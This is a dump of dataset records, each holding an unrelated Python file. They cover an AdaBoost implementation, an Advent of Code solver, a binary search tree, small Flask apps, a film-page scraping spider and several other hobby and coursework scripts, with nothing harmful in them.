model_version_id = data_access.model_version_id\n gbd_round_id = data_access.gbd_round_id\n database = execution_context.parameters.database\n locations_with_asdr_in_t3 = _asdr_in_t3(execution_context, model_version_id)\n missing_from_t3 = set(location_and_children) - set(locations_with_asdr_in_t3)\n if missing_from_t3:\n CODELOG.info(\n f\"\"\"Uploading ASDR data for model_version_id\n {model_version_id} on '{database}'\"\"\"\n )\n asdr_data = get_asdr_data(gbd_round_id, data_access.decomp_step, list(missing_from_t3), data_access.with_hiv)\n\n with cursor(execution_context) as c:\n _upload_asdr_data_to_tier_3(gbd_round_id, c, model_version_id, asdr_data)\n\n return True\n else:\n CODELOG.info(\n f\"\"\"ASDR data for model_version_id {model_version_id}\n on '{database}' already exists, doing nothing.\"\"\"\n )\n return False\n","sub_path":"src/cascade/input_data/db/asdr.py","file_name":"asdr.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"461168881","text":"# @Author: phd\n# @Date: 2019-11-08\n# @Site: github.com/phdsky\n# @Description: NULL\n\nimport time\nimport logging\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Binarizer\n\n\ndef log(func):\n def warpper(*args, **kwargs):\n start_time = time.time()\n ret = func(*args, **kwargs)\n\n end_time = time.time()\n logging.debug(\"%s() cost %s seconds\" % (func.__name__, end_time - start_time))\n\n return ret\n\n return warpper\n\n\ndef calc_accuracy(y_pred, y_truth):\n assert len(y_pred) == len(y_truth)\n n = len(y_pred)\n\n hit_count = 0\n for i in range(0, n):\n if y_pred[i] == y_truth[i]:\n hit_count += 1\n\n print(\"Accuracy %f\\n\" % (hit_count / n))\n\n return hit_count / n\n\n\ndef sign(x):\n if x >= 0:\n return 1\n elif x < 0:\n return -1\n else:\n print(\"Sign function input wrong!\\n\")\n\n\nclass AdaBoost(object):\n def __init__(self, X_train, y_train, max_classfifers):\n self.X = X_train\n self.Y = y_train\n\n self.sample_num = len(X_train) # sample num\n self.feature_num = len(X_train[0]) # feature num\n self.D = np.full(self.sample_num, (1./self.sample_num)) # weight distribution\n\n self.M = max_classfifers # max classifier number\n self.axis = np.full(self.M, -1) # min ei axis selected\n self.alpha = np.zeros(self.M)\n self.Gm = np.zeros(self.M) # basic classifier\n\n self.thresh_array = np.arange(np.min(self.X)-0.5, np.max(self.X)+0.51, 1)\n self.direction = np.full(self.M, -1)\n\n def basic_classifier(self, threshold, value, direction):\n if direction == 0:\n if value < threshold:\n return 1\n else:\n return -1\n elif direction == 1:\n if value > threshold:\n return 1\n else:\n return -1\n else:\n print(\"WTF the operation direction is?\")\n\n def train_basic_classifier(self, classifier):\n # After binarization, the value is 0 ~ 1, so the\n # threshold should be [-0.5, 0.5, 1.5]\n # For multi dimensional data, choose the axis which\n # has the min ei value to take part in decision\n min_ei = self.sample_num # all weight is 1 and hit\n selected_axis = -1\n threshold = self.thresh_array[-1] + 1\n\n direction_array = [0, 1]\n direction = -1\n\n for axis in range(self.feature_num):\n for th in self.thresh_array:\n axis_vector = self.X[:, axis]\n thresh_vector = np.full(self.sample_num, th)\n\n for direct in direction_array:\n # Use vector format calculation for accelerating\n if direct == 0:\n compare_vector = np.asarray([axis_vector < 
thresh_vector], dtype=int) * 2 - 1\n elif direct == 1:\n compare_vector = np.asarray([axis_vector > thresh_vector], dtype=int) * 2 - 1\n\n calc_ei = np.sum((compare_vector != self.Y)*self.D)\n\n # calc_ei = 0.\n # for sample in range(self.sample_num):\n # calc_ei += self.D[sample]*\\\n # int(self.basic_classifier(thresh, self.X[sample][axis]) != self.Y[sample])\n\n if calc_ei < min_ei:\n min_ei = calc_ei\n selected_axis = axis\n threshold = th\n direction = direct\n\n self.axis[classifier] = selected_axis\n self.Gm[classifier] = threshold\n self.direction[classifier] = direction\n\n return min_ei\n\n @log\n def train(self):\n m = 0\n while m < self.M:\n print(\"Training %d classifier...\" % m)\n\n # Train basic classifier and classify error\n ei = self.train_basic_classifier(classifier=m)\n\n # Calculate alpha value\n self.alpha[m] = 0.5*np.log((1 - ei) / ei)\n\n # Validate training\n train_label = self.predict(X_test=self.X, classifier_number=(m + 1))\n accuracy = calc_accuracy(train_label, self.Y)\n\n if accuracy == 1.:\n print(\"Fitting perfect on training set!\")\n return m + 1\n\n # Calculate regulator\n Zm = 0.\n for i in range(self.sample_num):\n Zm += self.D[i] * np.exp(-self.alpha[m]*self.Y[i] *\n self.basic_classifier(self.Gm[m], self.X[i][self.axis[m]], self.direction[m]))\n\n # Update weight distribution\n for i in range(self.sample_num):\n self.D[i] = self.D[i] * np.exp(-self.alpha[m]*self.Y[i] *\n self.basic_classifier(self.Gm[m], self.X[i][self.axis[m]], self.direction[m])) / Zm\n\n m += 1\n\n return m\n\n # @log\n def predict(self, X_test, classifier_number):\n n = len(X_test)\n predict_label = np.full(n, -1)\n\n for i in range(n):\n to_predict = X_test[i]\n result = 0.\n\n for m in range(classifier_number):\n result += self.alpha[m] * self.basic_classifier(self.Gm[m], to_predict[self.axis[m]], self.direction[m])\n\n predict_label[i] = sign(result)\n\n return predict_label\n\n\ndef example_large():\n mnist_data = pd.read_csv(\"../data/mnist_binary.csv\")\n mnist_values = mnist_data.values\n\n images = mnist_values[::, 1::]\n labels = mnist_values[::, 0]\n\n X_train, X_test, y_train, y_test = train_test_split(\n images, labels, test_size=0.33, random_state=42\n )\n\n # Binary the images to avoid AdaBoost classifier threshold complex\n binarizer_train = Binarizer(threshold=127).fit(X_train)\n X_train_binary = binarizer_train.transform(X_train)\n\n binarizer_test = Binarizer(threshold=127).fit(X_test)\n X_test_binary = binarizer_test.transform(X_test)\n\n adaboost = AdaBoost(X_train=X_train_binary, y_train=y_train, max_classfifers=233)\n\n print(\"AdaBoost training...\")\n classifier_trained = adaboost.train()\n print(\"\\nTraining done...\")\n print(\"\\nTraining done with %d classifiers!\" % classifier_trained)\n\n print(\"Testing on %d samples...\" % len(X_test))\n y_predicted = adaboost.predict(X_test=X_test_binary, classifier_number=classifier_trained)\n\n calc_accuracy(y_pred=y_predicted, y_truth=y_test)\n\n\ndef example_small():\n X_train = np.asarray([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9]])\n y_train = np.asarray([1, 1, 1, -1, -1, -1, 1, 1, 1, -1])\n\n adaboost = AdaBoost(X_train=X_train, y_train=y_train, max_classfifers=5)\n\n print(\"Adaboost training...\")\n classifier_trained = adaboost.train()\n print(\"\\nTraining done with %d classifiers!\" % classifier_trained)\n\n\nif __name__ == \"__main__\":\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # example_large()\n 
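# example_small() is the classic 1-D boosting exercise (10 points with\n    # labels +1/-1); with threshold stumps in both directions it is expected\n    # to fit the training set within a few boosting rounds.\n    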
example_small()\n","sub_path":"boosting/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"12914771","text":"import sys\nimport operator\nimport numpy as np\nimport pandas as pd\ndef myOptimActionOne(priceVec, transFeeRate, use_DP=True):\n\t\n\t_BUY = 1\n\t_HOLD = 0\n\t_SELL = -1\n\n\tdataLen = len(priceVec)\n\tactionVec = np.zeros(dataLen)\n\n\t# Dynamic Programming method\n\tif use_DP:\n\t\tcapital = 1\n\t\tmoney = [{'money' : 0, 'from' : 0 } for _ in range(dataLen)]\n\t\tstock = [{'stock' : 0, 'from' : 1 } for _ in range(dataLen)]\n\n\t\t# DP initialization\n\t\tmoney[0]['money'] = capital\n\t\tstock[0]['stock'] = capital * (1 - transFeeRate) / priceVec[0]\n\n\t\t# DP recursion\n\t\tfor t in range(1, dataLen):\n\t\t\t\n\t\t\t# find optimal for sell at time t:\n\t\t\thold = money[t - 1]['money']\n\t\t\tsell = stock[t - 1]['stock'] * priceVec[t] * (1 - transFeeRate)\n\n\t\t\tif hold > sell:\n\t\t\t\tmoney[t]['money'] = hold\n\t\t\t\tmoney[t]['from'] = 0\n\t\t\telse:\n\t\t\t\tmoney[t]['money'] = sell\n\t\t\t\tmoney[t]['from'] = 1\n\n\t\t\t# find optimal for buy at time t:\n\t\t\thold = stock[t - 1]['stock']\n\t\t\tbuy = money[t - 1]['money'] * (1 - transFeeRate) / priceVec[t]\n\n\t\t\tif hold > buy:\n\t\t\t\tstock[t]['stock'] = hold\n\t\t\t\tstock[t]['from'] = 1\n\t\t\telse:\n\t\t\t\tstock[t]['stock'] = buy\n\t\t\t\tstock[t]['from'] = 0\n\n\t\t# must sell at T\n\t\tprev = 0\n\t\tactionVec[-1] = _SELL\n\n\t\t# DP trace back\n\t\trecord = [money, stock]\n\t\tfor t in reversed(range(1, dataLen)):\n\t\t\tprev = record[prev][t]['from']\n\t\t\tactionVec[t - 1] = _SELL if prev == 0 else _BUY\n\t\t\n\t\t# Action smoothing\n\t\tprevAction = actionVec[0]\n\t\tfor t in range(1, dataLen):\n\t\t\tif actionVec[t] == prevAction:\n\t\t\t\tactionVec[t] = _HOLD\n\t\t\telif actionVec[t] == -prevAction:\n\t\t\t\tprevAction = actionVec[t]\n\n\t\treturn actionVec\n\n\t# Baseline method\n\telse:\n\t\tconCount = 3\n\t\tfor ic in range(dataLen):\n\t\t\tif ic + conCount + 1 > dataLen:\n\t\t\t\tcontinue\n\t\t\tif all(x > 0 for x in list(map(operator.sub,priceVec[ic+1:ic+1+conCount], priceVec[ic:ic+conCount]))):\n\t\t\t\tactionVec[ic] = _BUY\n\t\t\tif all(x < 0 for x in list(map(operator.sub,priceVec[ic+1:ic+1+conCount], priceVec[ic:ic+conCount]))):\n\t\t\t\tactionVec[ic] = _SELL\n\t\tprevAction = _SELL\n\n\t\tfor ic in range(dataLen):\n\t\t\tif actionVec[ic] == prevAction:\n\t\t\t\tactionVec[ic] = _HOLD\n\t\t\telif actionVec[ic] == -prevAction:\n\t\t\t\tprevAction = actionVec[ic]\n\t\treturn actionVec","sub_path":"HW3/myOptimActionOne.py","file_name":"myOptimActionOne.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"475207983","text":"import pickle\nimport pandas as pd\nimport argparse\nfrom init_loader import init, settings\n\n\ndef convert(path):\n #using pandas with a column specification\n col_specification =[(0, 7), (8, 38), (39, 40), (41,50), (51,60), (61,91), (93,94), (94,100),(100, 101), (101,107), (108,109), (109,110), (110,116), (116,117), (117,123), (124,136), (136,137), (138,139), (139,155), (155,158)]\n data = pd.read_fwf(path, colspecs=col_specification, names=('OID', 'Name','V','RAdeg', 'DEdeg', 'Type', 'l_max', 'max', 'u_max', 'n_max', 'f_min', 'l_min', 'min', 'u_min', 'n_min', 'Epoch', 'u_Epoch', 'l_Period', 'Period', 'u_Period'), converters={'l_max': str})\n\n 
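# Note: DataFrame.as_matrix() (used below) was deprecated in pandas 0.23\n    # and removed in 1.0; on newer pandas use .to_numpy() instead.\n    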
ra_deg_np = data['RAdeg'].as_matrix()\n dec_deg_np = data['DEdeg'].as_matrix()\n metadata = []\n for index, row in data.iterrows():\n metadata.append({'id': index, 'OID': row['OID'], 'Name': row['Name'], 'Type': row['Type'], 'l_Period': row['l_Period'], 'Period': row['Period'], 'u_Period': row['u_Period']})\n vsx_dict = { 'ra_deg_np': ra_deg_np, 'dec_deg_np': dec_deg_np, 'metadata': metadata}\n\n # From Python 3.6 onwards, the standard dict type maintains insertion order by default. => no OrderedDict necessary\n with open(settings.vsxcatalogdir, 'wb') as fp:\n pickle.dump(vsx_dict, fp)\n\n# returns: { 'ra_deg_np': ra_deg_np, 'dec_deg_np': dec_deg_np, 'metadata': ({'id': index, 'OID': row['OID'], 'Name': row['Name'], 'Type': row['Type'], 'l_Period': row['l_Period'], 'Period': row['Period'], 'u_Period': row['u_Period']})}\ndef read(path):\n with open(path, 'rb') as fp:\n read_dict = pickle.load(fp, encoding='latin1')\n return read_dict\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Converting vsx to pickle file vsx.bin')\n parser.add_argument('vsx_path')\n args = parser.parse_args()\n convert(args.vsx_path)\n","sub_path":"src/vsx_pickle.py","file_name":"vsx_pickle.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"47437342","text":"\"\"\"\nAUTHOR: M. Montgomery \nDATE: 12/08/2018\nFILE: day07.py \n\nPROMPT: \n--- Day 7: The Sum of Its Parts ---\n\nYou find yourself standing on a snow-covered coastline; apparently, you landed a little off course. The region is too hilly to see the North Pole from here, but you do spot some Elves that seem to be trying to unpack something that washed ashore. It's quite cold out, so you decide to risk creating a paradox by asking them for directions.\n\n\"Oh, are you the search party?\" Somehow, you can understand whatever Elves from the year 1018 speak; you assume it's Ancient Nordic Elvish. Could the device on your wrist also be a translator? \"Those clothes don't look very warm; take this.\" They hand you a heavy coat.\n\n\"We do need to find our way back to the North Pole, but we have higher priorities at the moment. You see, believe it or not, this box contains something that will solve all of Santa's transportation problems - at least, that's what it looks like from the pictures in the instructions.\" It doesn't seem like they can read whatever language it's in, but you can: \"Sleigh kit. Some assembly required.\"\n\n\"'Sleigh'? What a wonderful name! You must help us assemble this 'sleigh' at once!\" They start excitedly pulling more parts out of the box.\n\nThe instructions specify a series of steps and requirements about which steps must be finished before others can begin (your puzzle input). Each step is designated by a single letter. For example, suppose you have the following instructions:\n\nStep C must be finished before step A can begin.\nStep C must be finished before step F can begin.\nStep A must be finished before step B can begin.\nStep A must be finished before step D can begin.\nStep B must be finished before step E can begin.\nStep D must be finished before step E can begin.\nStep F must be finished before step E can begin.\n\nVisually, these requirements look like this:\n\n\n -->A--->B--\n / \\ \\\nC -->D----->E\n \\ /\n ---->F-----\n\nYour first goal is to determine the order in which the steps should be completed. If more than one step is ready, choose the step which is first alphabetically. 
In this example, the steps would be completed as follows:\n\nOnly C is available, and so it is done first. Next, both A and F are available. A is first alphabetically, so it is done next. Then, even though F was available earlier, steps B and D are now also available, and B is the first alphabetically of the three. After that, only D and F are available. E is not available because only some of its prerequisites are complete. Therefore, D is completed next. F is the only choice, so it is done next. Finally, E is completed.\n\nSo, in this example, the correct order is CABDFE. In what order should the steps in your instructions be completed?\n\n--- Part Two ---\n\nAs you're about to begin construction, four of the Elves offer to help. \"The sun will set soon; it'll go faster if we work together.\" Now, you need to account for multiple people working on steps simultaneously. If multiple steps are available, workers should still begin them in alphabetical order.\n\nEach step takes 60 seconds plus an amount corresponding to its letter: A=1, B=2, C=3, and so on. So, step A takes 60+1=61 seconds, while step Z takes 60+26=86 seconds. No time is required between steps.\n\nTo simplify things for the example, however, suppose you only have help from one Elf (a total of two workers) and that each step takes 60 fewer seconds (so that step A takes 1 second and step Z takes 26 seconds). Then, using the same instructions as above, this is how each second would be spent:\n\nSecond Worker 1 Worker 2 Done\n 0 C . \n 1 C . \n 2 C . \n 3 A F C\n 4 B F CA\n 5 B F CA\n 6 D F CAB\n 7 D F CAB\n 8 D F CAB\n 9 D . CABF\n 10 E . CABFD\n 11 E . CABFD\n 12 E . CABFD\n 13 E . CABFD\n 14 E . CABFD\n 15 . . CABFDE\n\nEach row represents one second of time. The Second column identifies how many seconds have passed as of the beginning of that second. Each worker column shows the step that worker is currently doing (or . if they are idle). The Done column shows completed steps.\n\nNote that the order of the steps has changed; this is because steps now take time to finish and multiple workers can begin multiple steps simultaneously. 
In this example, it would take 15 seconds for two workers to complete these steps.\n\nWith 5 workers and the 60+ second step durations described above, how long will it take to complete all of the steps?\n\"\"\"\n\nimport sys, re, copy\n\n\ndef extractPairs(instructions):\n\n Rpair = re.compile(\"Step (\\w) must be finished before step (\\w) can begin.\")\n \n pairs = []\n for line in instructions:\n data = Rpair.search(line)\n if data:\n pairs.append((data.group(1), data.group(2)))\n return pairs\n\n\ndef makeDependencies(IDs, pairs):\n\n dependencies = {}\n for ID in IDs:\n dependencies[ID] = []\n for A, B in pairs:\n dependencies[A] += [B]\n return dependencies\n\n\ndef determineOrder(IDs, dependencies):\n\n queue = []\n order = []\n\n # until every step is in the order\n while len(order) != len(IDs):\n\n # evaluate each remaining step\n for step in dependencies:\n if step in queue or step in order:\n continue\n\n # check if still dependent on another step\n available = True\n for other in dependencies:\n if step in dependencies[other]:\n available = False\n\n if available:\n queue.append(step)\n\n # add first step in sorted queue to order\n queue.sort()\n order.append(queue[0])\n\n # release step's dependents\n del dependencies[queue.pop(0)]\n\n return ''.join(order)\n \n\ndef determineTimedOrder(IDs, dependencies):\n\n queue = []\n order = []\n inProgress = []\n\n # set up for timing tasks\n timings = {}\n for ID in IDs:\n timings[ID] = ord(ID) - 4 # ord 'A' is 65; needs to be 61\n time = 0\n NWORKERS = 5\n\n # until every step is in the order\n while len(order) != len(IDs):\n\n # evaluate each remaining step\n for step in dependencies:\n if step in queue or step in inProgress:\n continue\n\n # check if still dependent on another step\n available = True\n for other in dependencies:\n if step in dependencies[other]:\n available = False\n\n if available:\n queue.append(step)\n\n # move steps from sorted queue to in-progress\n queue.sort()\n while len(inProgress) < NWORKERS and len(queue) > 0:\n inProgress.append(queue.pop(0))\n\n # work on each available step\n working = min(NWORKERS, len(inProgress))\n for i in range(working-1, -1, -1):\n\n # reduce time remaining by 1\n step = inProgress[i]\n timings[step] -= 1\n\n # completed a step\n if timings[step] == 0:\n\n # move step from in-progress to order\n order.append(step)\n inProgress.pop(i)\n\n # release step's dependents\n del dependencies[step]\n\n time += 1\n\n return ''.join(order), time\n\n\ndef main():\n\n # get input\n lines = [line.strip() for line in sys.stdin.readlines()]\n pairs = extractPairs(lines)\n IDs = set()\n for A, B in pairs:\n IDs.add(A)\n IDs.add(B)\n dependencies = makeDependencies(IDs, pairs)\n\n # PART ONE\n order = determineOrder(IDs, copy.deepcopy(dependencies))\n print(\"Order: \", order)\n\n # PART TWO\n order, time = determineTimedOrder(IDs, dependencies)\n print(\"New order:\", order, \"(\", time, \"seconds )\")\n\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"484655394","text":"from flask import Flask\napp = Flask(__name__)\n\ncount = 0\n\n@app.route('/')\ndef index():\n\tglobal count\n\tcount += 1\n\t\n\treturn 'Hello from application' + str(count)\n\nif __name__ == 
'__main__':\n\tapp.run(host='0.0.0.0')\n","sub_path":"app_example/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"629711678","text":"import pandas as pd\r\nimport itertools\r\nfrom itertools import permutations\r\n\r\n\r\ndef Ways(N):\r\n a = list(itertools.product([1, 2], repeat=N - 1))\r\n df = pd.DataFrame(a)\r\n df[\"sum\"] = df.sum(axis=1)\r\n new = df.loc[df['sum'] == N - 1]\r\n return len(new)\r\ndef findJumpingWays(N):\r\n count = 0\r\n for i in range(1,N):\r\n Ways(i)\r\n count= count + Ways(i)\r\n return count\r\n\r\nfindJumpingWays(3)","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"479471316","text":"import pytest\nimport numpy as np\nimport clusters.algs as algs\n\ndef test_hierarchical():\n\t# Setup\n thresh = 0.42\n \n x_input_hc = np.array([[0., 0., 1., 0., 0.],\n [1., 0., 0., 0., 0.],\n [0., 1., 0., 1., 1.],\n [0., 1., 0., 0., 0.],\n [0., 0., 0., 1., 0.]])\n \n desired_p_lab_hc = np.array([0, 1, 2, 2, 2])\n\n # Exercise\n HC = algs.HierarchicalClustering(x_input_hc, thresh)\n p_lab_hc = HC.cluster()\n\n # Verify\n np.testing.assert_array_equal(p_lab_hc, desired_p_lab_hc)\n\n\ndef test_partitioning():\n # Setup\n n_clusters = 1\n \n x_input_km = np.array([[0., 0., 1., 0., 0.],\n [1., 0., 0., 0., 0.],\n [0., 1., 0., 1., 1.],\n [0., 1., 0., 0., 0.],\n [0., 0., 0., 1., 0.]])\n \n desired_p_lab_km = np.array([0, 0, 0, 0, 0])\n\n # Exercise\n kmodes = algs.PartitionClustering(x_input_km, n_clusters)\n c, c_lab, p_lab_km = kmodes.cluster()\n \n\n # Verify\n np.testing.assert_array_equal(p_lab_km, desired_p_lab_km)","sub_path":"test/test_clusters.py","file_name":"test_clusters.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"534647606","text":"from graphviz import Digraph\n\n\nclass TreeNode:\n def __init__(self, node):\n self.node = node\n self.child_left = None\n self.child_right = None\n\n # set the left child of current node\n def set_child_left(self, node):\n self.child_left = TreeNode(node)\n\n # set the right child of current node\n def set_child_right(self, node):\n self.child_right = TreeNode(node)\n\n # returns recursively all childs beginning from the current node as string\n def print_childs(self):\n if self.child_left is None and self.child_right is None:\n return f\"{self.node}\"\n elif self.child_left is not None and self.child_right is None:\n return f\"{self.node}(L_{self.child_left.print_childs()})\"\n elif self.child_left is None and self.child_right is not None:\n return f\"{self.node}(R_{self.child_right.print_childs()})\"\n elif self.child_left is not None and self.child_right is not None:\n return f\"{self.node}(L_{self.child_left.print_childs()}, R_{self.child_right.print_childs()})\"\n\n\nclass BinarySearchTree:\n def __init__(self, root):\n self.root = TreeNode(root)\n self.dot = None\n self.node_count = 1\n\n # insert a new node into the BST\n def insert_node(self, node):\n recent_node = self.root\n place_found = False\n while not place_found:\n if node < recent_node.node:\n if recent_node.child_left is None:\n recent_node.set_child_left(node)\n place_found = True\n self.node_count += 1\n else:\n recent_node = recent_node.child_left\n elif node > recent_node.node:\n if 
recent_node.child_right is None:\n recent_node.set_child_right(node)\n place_found = True\n self.node_count += 1\n else:\n recent_node = recent_node.child_right\n\n # print the whole BST\n def print_tree(self):\n print(self.root.print_childs())\n\n # search node in BST\n # returns if found and amount of comparisons needed\n def search_node(self, node):\n compare_count = 0\n recent_node = self.root\n while recent_node is not None:\n if node < recent_node.node:\n compare_count += 1\n if recent_node.child_left is None:\n return False, compare_count\n else:\n recent_node = recent_node.child_left\n elif node > recent_node.node:\n compare_count += 1\n if recent_node.child_right is None:\n return False, compare_count\n else:\n recent_node = recent_node.child_right\n else:\n compare_count += 1\n return True, compare_count\n\n # print if found node in BST and how many comparisons needed\n def search_node_print(self, node):\n in_tree, steps_tree = self.search_node(node)\n if in_tree:\n print(f\"{node} in Tree ({steps_tree} nodes compared)\")\n else:\n print(f\"{node} not in Tree ({steps_tree} nodes compared)\")\n\n # important helper method to render the BST with graphviz\n def gen_graph_node(self, graph_node):\n if graph_node.child_left is not None:\n self.dot.node(str(graph_node.child_left.node), str(graph_node.child_left.node))\n self.dot.edge(str(graph_node.node), str(graph_node.child_left.node))\n self.gen_graph_node(graph_node.child_left)\n else:\n self.dot.node(str(graph_node.node) + \"LNone\", \"\")\n self.dot.edge(str(graph_node.node), str(graph_node.node) + \"LNone\")\n if graph_node.child_right is not None:\n self.dot.node(str(graph_node.child_right.node), str(graph_node.child_right.node))\n self.dot.edge(str(graph_node.node), str(graph_node.child_right.node))\n self.gen_graph_node(graph_node.child_right)\n else:\n self.dot.node(str(graph_node.node) + \"RNone\", \"\")\n self.dot.edge(str(graph_node.node), str(graph_node.node) + \"RNone\")\n\n # generate png image of the BST\n def gen_graph_tree(self):\n self.dot = Digraph(format='png')\n self.dot.node(str(self.root.node), str(self.root.node))\n self.gen_graph_node(self.root)\n self.dot.render(\"BST\", \"images\")\n del self.dot\n\n\nif __name__ == '__main__':\n B = BinarySearchTree(8)\n B.insert_node(3)\n B.insert_node(2)\n B.insert_node(10)\n B.insert_node(5)\n B.insert_node(4)\n B.insert_node(7)\n B.insert_node(12)\n B.insert_node(11)\n B.print_tree()\n B.search_node_print(4)\n B.search_node_print(11)\n B.gen_graph_tree()\n","sub_path":"datastructures/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"507903167","text":"# a list digits\nlist_of_digits= [0,1,2,3,4,5,6]\n# take input from user\ninput_digit= int(input(\"Enter a digit: \"))\n# search the input digit in our list\nfor i in list_of_digits:\n if input_digit== i:\n print(\"Digit is in the list\")\n break\n else:\n print(\"Digit not found in list\")","sub_path":"Python_codes/DemoForElse.py","file_name":"DemoForElse.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"79285127","text":"# web server and application for annotation\n\nfrom flask import Flask, render_template, redirect, url_for\nimport requests\nimport json\nimport os\n\napp = Flask(__name__)\n\nport = 80\n\n@app.route('/annotate')\ndef annotate():\n img = \"00200.jpg\"\n return 
render_template(\"index.html\", image=img)\n\n\n@app.route('/hello')\n@app.route('/hello/')\ndef hello(name=None):\n return render_template(\"index.html\", name=name)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=port)","sub_path":"scripts/annotation/annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"188720017","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('xx_mgr', '0012_mgrimage_style'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='mgrtag',\n name='show_mobile',\n field=models.IntegerField(default=1, verbose_name='\\u662f\\u5426\\u79fb\\u52a8\\u7aef\\u663e\\u793a', choices=[(0, '\\u9690\\u85cf'), (1, '\\u663e\\u793a')]),\n ),\n ]\n","sub_path":"xx_mgr/migrations/0013_mgrtag_show_mobile.py","file_name":"0013_mgrtag_show_mobile.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"414039945","text":"from GeneticAlgorithmComponents.crossovers.crossoverwithonecutoffpoint import CrossoverWithOneCutoffPoint\nfrom GeneticAlgorithmComponents.mutations.bitflip import BipFlip\nfrom GeneticAlgorithmComponents.selections.roulette import Roulette\nfrom GeneticAlgorithmComponents.selections.tournament import Tournament\nfrom MarcoAntonioGomesRastrigin.rastrigin_ga import RastriginGa\n\n\ndef marco_antonio(nvar, ncal):\n population_size = 100\n maximum_number_of_generations = ncal / population_size\n crossover_probability = 0.80\n mutation_probability = 0.3\n mutation = BipFlip()\n crossover = CrossoverWithOneCutoffPoint()\n selection_1 = Tournament(10)\n selection_2 = Roulette(10)\n precison = (10 ** (-3))\n xmin = -5.12\n xmax = 5.12\n c_max = 0\n\n rastrigin_ga = RastriginGa(population_size,\n maximum_number_of_generations,\n crossover_probability,\n mutation_probability,\n mutation,\n crossover,\n selection_1,\n nvar,\n precison,\n xmin,\n xmax,\n selection_2, c_max)\n\n rastrigin_ga.init_population()\n rastrigin_ga.run_ga()\n the_best_subject = rastrigin_ga.select_the_best_subject()\n print(\"X*: \", the_best_subject.binary_string)\n print(\"F*: \", the_best_subject.fitness - c_max)\n\n\nif __name__ == '__main__':\n marco_antonio(10, 10000)\n","sub_path":"MarcoAntonioGomesRastrigin/marco_antonio_gomes_rastrigin.py","file_name":"marco_antonio_gomes_rastrigin.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"163231073","text":"import requests\nfrom bs4 import BeautifulSoup\nimport lxml.etree\nimport scrapy\nfrom spider1.items import Spider1Item\n\n\n\nclass MaoyanSpider(scrapy.Spider):\n name = 'maoyan'\n allowed_domains = ['maoyan.com']\n start_urls = ['https://maoyan.com']\n\n def start_requests(self):\n user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'\n headers = {}\n headers['user-agent'] = user_agent\n myurl1 = 'https://maoyan.com/board'\n response1 = requests.get(myurl1, headers=headers)\n response1.encoding='utf-8'\n soup = BeautifulSoup(response1.text, 'html.parser')\n title_list = soup.find_all('p', attrs={'class': 'name'})\n for i in range(len(title_list)):\n link = 
('https://maoyan.com'+title_list[i].find('a').get('href'))\n yield scrapy.Request(url=link, callback=self.parse)\n\n def parse(self, response):\n items = []\n item = Spider1Item()\n selector = lxml.etree.HTML(response.text)\n film_name = selector.xpath('/html/body/div[3]/div/div[2]/div[1]/div/text()')\n film_type = selector.xpath('/html/body/div[3]/div/div[2]/div[1]/ul/li[1]/a[1]/text()')\n plan_date = selector.xpath('/html/body/div[3]/div/div[2]/div[1]/ul/li[3]/text()')\n \n item['title'] = film_name\n item['link'] = film_type\n item['time'] = plan_date\n \n items.append(item)\n return items","sub_path":"week01/spider1/spider1/spiders/maoyan.py","file_name":"maoyan.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"36006284","text":"import os\nimport logging\nimport pickle\nimport torch, torch.nn as nn, torch.optim as optim\nimport torchvision.transforms as xforms, torchvision.datasets, torchvision.utils\nfrom PIL import Image\nimport PIL\nfrom torchvision.utils import save_image\nfrom torchvision import datasets, models, transforms\nfrom flask import send_from_directory\nfrom flask import Flask, render_template, request, redirect\nfrom flask_dropzone import Dropzone\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\n\nclass Generator(nn.Module):\n def __init__(self):\n 